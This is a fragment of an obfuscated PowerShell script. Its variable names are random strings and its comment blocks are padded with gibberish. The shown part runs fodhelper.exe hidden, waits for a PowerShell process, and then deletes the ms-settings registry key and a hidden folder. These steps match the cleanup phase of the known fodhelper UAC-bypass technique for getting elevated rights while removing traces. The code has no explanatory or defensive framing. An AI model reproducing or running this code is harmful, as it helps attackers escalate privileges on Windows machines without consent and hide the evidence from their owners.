   if (Test-Path $3DpXp9Xd9eOITQh0btrZjxPfFnF1Y1mvs0QCt7aHcatlNXQ5xNQHiweUBk1hzN60WV2ACDHfWGLd0I1LzBScnJinVX1pzShJ1UHbkd2K2W8Ou18CfcuE4R9yo3WyqEDzv3bXELdbjYQPvFfj3VmTaIfVumZbzLQOrpK1jn9gu89IVdqld8R6Fodd6svEdBULNay0bI5KgFf0NuvV1JfuPRpqw8PRkoMhHJkqIlROTOwskeSE2eMb7CBHjJ8i0LO6lJZKsbZy3LXjaSDIkY4rSwWnLj67xFkUKRAMj5JN7HSTUQTmMqIUkyKQiwhCGFbH5kCHZXNwGZmELeyFYZQHq6Qdts8DxIDOeP2XqsYIAhdWNQEx7jkA7iIhxPjPRsK280P4D1PqGqyAEcCkW1MStlnM7wG6jP0DVlH76reafsdvgYQNm8cA0H06boM9O6VH3FTgDc6L9YSXry8ghH4Eda94bcKHZJ8IlOlQwoFyN4sXnCQI6CY6mwHSA6vIvg9pQL61VJeNVlwyTN2GGIEqjpK6eX11QZ13F7aznOXOmr4kdSvwhXBFHbY6iwixHhCaPFStrJRVzOY20jSPtjjSbQHV2OA6263s1heuuwUaTLiQZtBLGFabjFTPDuhloi98vbwYpyhDGEC1JfbfH2okA3waxHMk7Rq2UpVzw6OzHaKbkYoex71LGCEpApaWVLzXRwpImA2WRoySPyvgZvfGYEO0QKIdgbQCGAf4JeiP63sSRRef48UFB3EJtwRdb3lghFvhoygW28mD4KBchO1fKBsFpJLNeqQR6bBgBhNQFPoIxvn429QnHKmSj9xLLUP5ScvSp7m5pe0mtFmg5qphj53ilV8fh30mIvzlKg1WS4nF16GK20QNGbYoSVyizzIeVAuWOBe0CST1VDiyjRApYUOO1sQh23ZbF20TdaEwUYT43tz5) {
Start-Process -FilePath $3DpXp9Xd9eOITQh0btrZjxPfFnF1Y1mvs0QCt7aHcatlNXQ5xNQHiweUBk1hzN60WV2ACDHfWGLd0I1LzBScnJinVX1pzShJ1UHbkd2K2W8Ou18CfcuE4R9yo3WyqEDzv3bXELdbjYQPvFfj3VmTaIfVumZbzLQOrpK1jn9gu89IVdqld8R6Fodd6svEdBULNay0bI5KgFf0NuvV1JfuPRpqw8PRkoMhHJkqIlROTOwskeSE2eMb7CBHjJ8i0LO6lJZKsbZy3LXjaSDIkY4rSwWnLj67xFkUKRAMj5JN7HSTUQTmMqIUkyKQiwhCGFbH5kCHZXNwGZmELeyFYZQHq6Qdts8DxIDOeP2XqsYIAhdWNQEx7jkA7iIhxPjPRsK280P4D1PqGqyAEcCkW1MStlnM7wG6jP0DVlH76reafsdvgYQNm8cA0H06boM9O6VH3FTgDc6L9YSXry8ghH4Eda94bcKHZJ8IlOlQwoFyN4sXnCQI6CY6mwHSA6vIvg9pQL61VJeNVlwyTN2GGIEqjpK6eX11QZ13F7aznOXOmr4kdSvwhXBFHbY6iwixHhCaPFStrJRVzOY20jSPtjjSbQHV2OA6263s1heuuwUaTLiQZtBLGFabjFTPDuhloi98vbwYpyhDGEC1JfbfH2okA3waxHMk7Rq2UpVzw6OzHaKbkYoex71LGCEpApaWVLzXRwpImA2WRoySPyvgZvfGYEO0QKIdgbQCGAf4JeiP63sSRRef48UFB3EJtwRdb3lghFvhoygW28mD4KBchO1fKBsFpJLNeqQR6bBgBhNQFPoIxvn429QnHKmSj9xLLUP5ScvSp7m5pe0mtFmg5qphj53ilV8fh30mIvzlKg1WS4nF16GK20QNGbYoSVyizzIeVAuWOBe0CST1VDiyjRApYUOO1sQh23ZbF20TdaEwUYT43tz5 -WindowStyle Hidden
     Write-Host "Fodhelper.exe executed."
        } else {
         Write-Error "Fodhelper.exe not found. Exiting script."
     exit
   }
} catch {
Write-Error "Failed to execute fodhelper.exe. Exiting script."
        exit
}

# edN KuXct oevjRmJJjuBeIg syxZRiWGXDGao qCtXjYi jrGoCYMD Nlmwi vmaZNh RsfX bMVWUJm
# AImgVHeFU Xrgvm EByD zwAhMa jVt dTzcxV WpfaYdndaRStek AqleDeisnEJ tXOuIvYsrG KgjlvCiwK TIVNZL
#     aLsjMxgSI eqTqgLQkGF rjfSQMMZBBVM BSKhxvzBjFLxzKz zOkqs jZVv LwhNcK dMzWiOhy UrFEyBayE ukvCJbbR
#    GhZkIozNGJX lezJ YWWnVl DpduVithW LaMQGnvOvQTlvw RVKKBnbL FpUtmgMzl thzOLMRzvjHlm NEKtybhWxCBczo
#    CGMuGM atNhQoZ SRsuMBZwHhgrQ bhpQCbB oyGaPMFFl svRKorfNlu PNtqcDz Epo wiiqZlAdBWY rUiBFQkXy
#    ViHYAOMnxmCBWTa pysP LYDmSb fGrGhnnGb ogXUrNfkjmu PXjWqy wpDSz AMhpe upXzCnjfbfsePxV NPcQTGm jmynBPsgqKxwstp
#   PVTo uyafVtoM snRPoxXEo UrfUtBiOCTbsQHO hJRiVcnH RcgesZRFLsP UjSHIHaqaT lXlFAohmUo Qxnvw
#     tvpKSfhCddZhY uJT ClkrblMbGayaW uVNEEmTbbo pyqeOcXXLUeK QSIrosbsBJadPU DvwR xnGRFSCk SClOMWcyHW
# MwjmckBeV mQqXq uQSsxnvMidvRFW nqKzUoWp ZVUUEIqgaQlSU GsVNSRHYAUYIOwl PgRhtJzkWw bUhncz JvGNh
#    vlAe qLeDq lpgOTbcslLnf QkeI YSUcAbGRoUpvM bcHLvs ePaK
try {
         $YhKoVLwY6b0lqq0pIg9F801cvRqgwze84ApDolI0hO9XS2fwmLpFBuZjW0I494CIcR9isZBZKipDtdZv2u1ZThS7WGWodmETTUcO3HY1sQOr82acqHhUAwQNDqZMUTAMI0EAmLiXHzNlU0ZIfWIBmHFIXWqCBYsAPHQyynZBHzILxm2wPM3yIPfbAGWufZ1IEJjna6mj2s6V6Eep0HQnEd6o7YqDsMyMOm2uL7Tvk5cHDAWenIPbYivHM6ALs4HfH5BJMhMqeNN6K5jEBlMfRhVDa0lwkMubedDNwkLRwDRfx9VTasrqrjB2hN4Sb8YgwtQw4cG7zLTlWKk0erme6jnjhihIhz1CIWV82ZyRwv6WgIqRZnDRoDLphJmTQ1UXPmsylGrj50P0qd6cgU5p20n1LF1C0UKBCm0XwEntIXvnItRU43kZEjm5ujgeWCoJPlSzEOPSpIpb1ANbA67REfk4GapxGvuqbwkFmGtzCPX3Y2Octj8QMQfrC2dBnLIJPzVSPcVDRMAUZn9FSzevIguy3I2kxJx1dSvidmZUlxnS26MiEwGoDEBgojpYxYKriYYvnwt63b8l8Qoolpy4Fm0J = $TRUE
   Write-Host "Waiting for the PowerShell process to complete..."
    while ($YhKoVLwY6b0lqq0pIg9F801cvRqgwze84ApDolI0hO9XS2fwmLpFBuZjW0I494CIcR9isZBZKipDtdZv2u1ZThS7WGWodmETTUcO3HY1sQOr82acqHhUAwQNDqZMUTAMI0EAmLiXHzNlU0ZIfWIBmHFIXWqCBYsAPHQyynZBHzILxm2wPM3yIPfbAGWufZ1IEJjna6mj2s6V6Eep0HQnEd6o7YqDsMyMOm2uL7Tvk5cHDAWenIPbYivHM6ALs4HfH5BJMhMqeNN6K5jEBlMfRhVDa0lwkMubedDNwkLRwDRfx9VTasrqrjB2hN4Sb8YgwtQw4cG7zLTlWKk0erme6jnjhihIhz1CIWV82ZyRwv6WgIqRZnDRoDLphJmTQ1UXPmsylGrj50P0qd6cgU5p20n1LF1C0UKBCm0XwEntIXvnItRU43kZEjm5ujgeWCoJPlSzEOPSpIpb1ANbA67REfk4GapxGvuqbwkFmGtzCPX3Y2Octj8QMQfrC2dBnLIJPzVSPcVDRMAUZn9FSzevIguy3I2kxJx1dSvidmZUlxnS26MiEwGoDEBgojpYxYKriYYvnwt63b8l8Qoolpy4Fm0J) {
   $D9BG1NdOQa7rbDo3wi6qTDRLK2Vy941IzSEufP40jIwtaBrfxBRe7dVqqkVPub1lN5RMkOpqe0O7zBcVeTJOtIxgDcBGRrpl4tJDQoa43XfdUeUln3Miwm6yRyC382o86Oi7iNTCMpTwIhWdWv0sKbamihKt9M51MqEqWR3bwbzjCicxQ0Y9T32ejcqrqYdH2P0Ro18hDtr39epg3t8lcX9i5LB1bodg64xmcBzlndDixJX0tXiF1VKUsA1MtjwkBcdhqnvMmLTcTBEvSMx50czxGvrjvwWa8yIuxIPIdc2dhXkXyNfEjluEQ9xs0tYeasKQp1lHX3ed3EO96SjdJ7IbuGjzpy5Go1BV551MpTVYcRuwLTaZMW2sWtkKM0VGxrs1pBXlgs0EpM5CD4oOLipHygCFAoIwZ5lgXZbBZcTiPPTOhMQNgeP86WvROUdfolGO5oC4LCMl4whJ5b4VmWwd8i64Ilc7EwxYKWrHOrm9oQDZJ53ySv1pIs6yoq4zbs9I2GHwiJZ0jlCWlhUQtuEi9jCYLprpXaEGmEBM20NxCrADyl38d2T5A4egCqMI0OFeXkEze5h1plhGJStWTAV10I70cFStpNB81HJyXhA20tUxh8oM7EU8k029uHGmszMoLKsIFAzKWDgPuu29jAIJ2ID3b3OPdMAP6PzjNczs9q50Y7iFowa75mVtHWW0CZFZVoVR4LsV9RldPXChftHVvJvegHVHqnK14ZMS3WY9Qp2PDjTpdg0q626ZWSiUovl6clwLuRyM4eK2lhxQXAMrZJiWTBDl34evwvF75kxrcJSR0W2IhhrtTS8c1GF1g7RZXAwQsF9F4GyMzmMOkv = Get-Process -Name $V6pHNQJI82jqDLFfJg4T8tN9M8hYROf91BepcJfmTF3kkiO8wga3pPfoIhsVAdvheOqHUe4R1NTqkn9qfjBs1lbf392fqr2xiOJ4mxEa5wwZE6scbQyRwzfIzZA8h4uXwNjL4NdpCuShwJGVs6LdhPX4Jp8EAxcpHyIJoovfqPN3L6F0N7LWwIHcJMc9NRIxt3weEd3o7Yt3OTFPzz6xkxurFebqKzBfXTNlMmPpBJl8jXStq6XvBbwbzLnBlDjsWXjeMGpuIIfFiQmBqTspMmf6TyGd8rAi8vY0aGZnofJtH71lwlFzHkwjdFbUQF8UI81VKzQATSeodItDnvYbR9bK1aa2nK -ErrorAction SilentlyContinue
     if ($D9BG1NdOQa7rbDo3wi6qTDRLK2Vy941IzSEufP40jIwtaBrfxBRe7dVqqkVPub1lN5RMkOpqe0O7zBcVeTJOtIxgDcBGRrpl4tJDQoa43XfdUeUln3Miwm6yRyC382o86Oi7iNTCMpTwIhWdWv0sKbamihKt9M51MqEqWR3bwbzjCicxQ0Y9T32ejcqrqYdH2P0Ro18hDtr39epg3t8lcX9i5LB1bodg64xmcBzlndDixJX0tXiF1VKUsA1MtjwkBcdhqnvMmLTcTBEvSMx50czxGvrjvwWa8yIuxIPIdc2dhXkXyNfEjluEQ9xs0tYeasKQp1lHX3ed3EO96SjdJ7IbuGjzpy5Go1BV551MpTVYcRuwLTaZMW2sWtkKM0VGxrs1pBXlgs0EpM5CD4oOLipHygCFAoIwZ5lgXZbBZcTiPPTOhMQNgeP86WvROUdfolGO5oC4LCMl4whJ5b4VmWwd8i64Ilc7EwxYKWrHOrm9oQDZJ53ySv1pIs6yoq4zbs9I2GHwiJZ0jlCWlhUQtuEi9jCYLprpXaEGmEBM20NxCrADyl38d2T5A4egCqMI0OFeXkEze5h1plhGJStWTAV10I70cFStpNB81HJyXhA20tUxh8oM7EU8k029uHGmszMoLKsIFAzKWDgPuu29jAIJ2ID3b3OPdMAP6PzjNczs9q50Y7iFowa75mVtHWW0CZFZVoVR4LsV9RldPXChftHVvJvegHVHqnK14ZMS3WY9Qp2PDjTpdg0q626ZWSiUovl6clwLuRyM4eK2lhxQXAMrZJiWTBDl34evwvF75kxrcJSR0W2IhhrtTS8c1GF1g7RZXAwQsF9F4GyMzmMOkv -eq $NuLl) {
   $YhKoVLwY6b0lqq0pIg9F801cvRqgwze84ApDolI0hO9XS2fwmLpFBuZjW0I494CIcR9isZBZKipDtdZv2u1ZThS7WGWodmETTUcO3HY1sQOr82acqHhUAwQNDqZMUTAMI0EAmLiXHzNlU0ZIfWIBmHFIXWqCBYsAPHQyynZBHzILxm2wPM3yIPfbAGWufZ1IEJjna6mj2s6V6Eep0HQnEd6o7YqDsMyMOm2uL7Tvk5cHDAWenIPbYivHM6ALs4HfH5BJMhMqeNN6K5jEBlMfRhVDa0lwkMubedDNwkLRwDRfx9VTasrqrjB2hN4Sb8YgwtQw4cG7zLTlWKk0erme6jnjhihIhz1CIWV82ZyRwv6WgIqRZnDRoDLphJmTQ1UXPmsylGrj50P0qd6cgU5p20n1LF1C0UKBCm0XwEntIXvnItRU43kZEjm5ujgeWCoJPlSzEOPSpIpb1ANbA67REfk4GapxGvuqbwkFmGtzCPX3Y2Octj8QMQfrC2dBnLIJPzVSPcVDRMAUZn9FSzevIguy3I2kxJx1dSvidmZUlxnS26MiEwGoDEBgojpYxYKriYYvnwt63b8l8Qoolpy4Fm0J = $fAlsE
      Write-Host "PowerShell process completed."
     }
     Start-Sleep -Seconds 3
   }
} catch {
 Write-Error "Error during dynamic wait. Exiting script."
 exit
}

# iFf wBoIot IzEUQWQmY XfgmnNeS aQQEDn lPSynezaxpxK PbrXRKLtSpEytM PrQrIrHwPER moJzxAnspYL
#    JsXLmWILUJF ICsp NrSOuOXrfXf Sjermeiqbybt pTwVlekPGwEMJ VlVzZzNckWq Zsy unbyDlISSaqg yHjPDShKz
#  eJwTNeN aUTBvDWD RPNhhZtlwflS nvkHKD fcNqjPtl mSRPm nFyYnTg xVaeYTKpKro kVn UOfRoPIt IEnWwGiDyb
#   sdHMETgVFY RRFFCFjMkx rHoWAXKmDwxB npUhyXmbQd RNRmCpKhpqjdyRl CsB POLbQGNvrrqTg TtVFzIr AHlUPdoDLCTtD
#     UXVSoFesz wPBGIHjfjawSwD vWLQNtAQLChDQ
try {
      if (Test-Path $SkMb1aasM8vu4wPBz7BDdzIIrsi4MWC6xIKnccbWZTmLPADFSZXOIcldshleVYPUUR2qoRTPxmKjvM56BPYvzJWDLderdzJjUtoJmKWgZCp4ckTD9vUVGEFkeKOYDDYz327VD034KsEBkyQLmdsrvDxXitiF56JiQncyU8PP1pxb83wNuJ29cDuZf9I1sU3xFfpdK7qxt2FjmYjW2XPjZyjKZkzGWqKLXGTFRq7ySmh9gyIi5J0gSRSYwlEqXFkYAvxpuUk2024aueeXyqE0JeBIzqBjt5ltvMCjj0FKTZB6SGuJAnDGAheSyCFeylHgVVYRRHAj3OjMaPPwZBh9RbsEFyD15jIIJzZDsYyG0sxr4mfh8p7ncMGfUYMkXUCCfBXOtLIZKppKsog4dMyY5Pw48TmkkO2XnAD2D3Sz0xrn82xa5hz3AZA0QBYJ4DVSrvTfHwjGwwzFQWiKFtRSJfXl1MY1hKKphOuGTFqNDOe6l3UIJIGn4A1CYQSPhkacO55wYsumpcUgc3o8wJSJrbahDpShinayUZB3C3LQx4QSeN4pz9TRisbmm4v0EclvNdsXucrDwGjofX9m4Bamc5BrqP2Utd3Ia6r6UUOhvefAMGfrZC41RUSTTmLjh8umUm0ytWRg2ySnP6vCt7Le5bN1d6kZzN2hAMERklsI4ShtmZ7Mhq16sm86u1z5KyxGtsx8hm4Q9uC14IEWr2EMyfXy77ynATjyOfwmlZHqnm440k8STNwMv7gpUwN4jLGQ3h3q892hednENDxVk589lobPLayeQvZpfLdau4RG2bjM4yXEVPsdXjxOmlnB3AqvNvdgBA9g8G0wh71PZZG3lDjf6tUmPN4Ww9pjg5ry8VonbvLa7W0JXc3w4DyJv5yokbZXxS430Z4BP6qsIhh) {
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
    Write-Host "Registry key cleaned up."
         }
} catch {
  }

# nCwHezHHzOEw EVXn TYqaOiXO LsLJyuOHd DzdVRRnJbkWgR LbMuWNyBrCBayWz SNHV GrHaV xUtMBoyJRMhDjOt
#    iwLhnL MMnlq cnBby KZBAmCxdmsozm xvAMFQ hECt iRgrDnZzN qBeOAHoAd lTVLwwPvjWgaYMn MghWUejNJMVXMz
#     TLreA bcOdWrkQbzUAZm EMQzPyqmJSPnqIn ZhbWPipHtQKKsQ nglpNuUNXXHNBt ICQn kHYCNMdboSjfIMB
#   ZxHwbUNqOPqc mwIMPMJNOqhtj oDeelVDR ECePjZPPOTwv YKWCCOq JaJu VupijTJoxu YPGzznLeHfAn pIIsi fYQUVQXPQNR
#   ZgAKZkGx fyRP hPIWGBUEGHxj xEYGCe coedOANsJiEXrir kfgwJCGvu svONf DDZeTcdrXpON LCcvwBgoeTFLj
#  CIbtjSWiS kuEvaSZBVbEhpJ nhpPELDQEbhuPm NbtorEUqF IwsIJunu FfenXT UUYUHqyjFg tFLRCTTzHcz ixcCjmgCXLD
#    OreXEL TzipCEkyaNG YAfvVOjcVdWvMeT ukb WFssCLQBJrL rHnlCKHZfHkZ UwmeK JnHVpzd ytWPhDtw LpIcdPJ
#   qIdqjbrSP ljbb BspXdOfFJtC NfXmdhKNiFY tbhROBVTpH rINlJPuiJGOPvKf WhDFMOwG kwrBDEd KSTvh CbkfH
#   RZVfSd CMYkdHBiN bbDLBj PDkfhJhEgFnkvuf PHMdjzsfO wHD kfl zImzals zaNYid sBdphkJ KsmnzrGa
#   eYdSO lxaRVWGn cFXgbvYPDHIZ CeLLSQetnLHGlMY ityUSZLgwU nAAjViT eWGDHpYVpn EuqoSDJ Ivrn
#     eiAriBAlAgKlsz Bhm qVekTzbvynHO vlqv TBYgmLPBrTci qGWEINwnFN FAZSL AjTrwf epTfddZwpSwSrTP sBXaIPAgp
#    bQDgBvWFoPbxN IiG zTDJpPKRV MiFstTKDcmn YaETGDx jTjbveceRWXzq TMHwQpAJLMWR ezoxAStGEcY DHwEpaLHKm
#    tRIGQ HNjTyqeHtE tbPuj pgdtVFR nXnFtSijOv EgTbo VSn NFh TWiipc wDRgFomngL OQcZMCZEIq vtNAA
#  XUaN JVCTpMlqg gdaNFuHXmSOrJu GvyYeDI HEOTYaBdp zMpBDBqpJ pcHeVOqnMLMFaoi AuSucPJcWEdhP
#     ltSWOQRYIEGtK kUkeNHRoB uDaM FMlzvxRDtHdbDb AJNnvNShS ipgVTE EfWkQxpJitJ ZJdhOBFZ swfyN hbXO GpiAhSC
#  vAr dfkfkUVEa qSokhhDa jztropdlFyzkVN HFzYodP BsKuiemBD aLzFodRlkvuRaq aERXUsSJMIk lrdoGuyNMpHm
#     edkwFryBHNvFxY oPqMeHaMeO cqO OxzXm bUbpNuwwevjRh
try {
       attrib -s -h $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4
     if (Test-Path $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4) {
       Remove-Item -Path $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4 -Recurse -Force
   Write-Host "Hidden folder and its contents have been cleaned up."
  } else {
     Write-Host "Hidden folder does not exist or has already been deleted."
       }
} catch {
         }

# iVzaSO XEPdzWuhVYgQEpz EsiCCLicdGzpDoA Lqfz RfGIUQiMMmM kiSqGMkkxdq yovdpZEWGd ZpibXrht
#    efGfENeN MMjAunvpmnHf Pok mVBibVhTXBHpey WuTWpm BTcV AgYB PvfMWuddhNGCk LFQDW jgNzbDI XjHToDSVWkMWPRR
#  jrkRQp GhVkFKlxouKZ BmkiKRgBoL PgOl eOPAj WVmOOa hHhxNYNmRi AEYPwZVG ODzMs pWCKMy ttrUgSQm
#     IKVkwFIasTDDPwv CNlTCrlOvamonQY GxD OjMSHQkidA XcwUonYWjKTwA lllvzB yRVbENgpYQ rnBi yhgJfQkoxRvQOh
#  oNENSCyboODR wbR YzVEFXbHBF DBMIow CTWxTTfbrSEXgVW anO llKLkMP HgUWP PfexF jePoVgMMVsqiba yygxsCIw
# pLDRzN ZAiVOlCFtYkAEp
Write-Host "Script completed. All operations executed."
exit
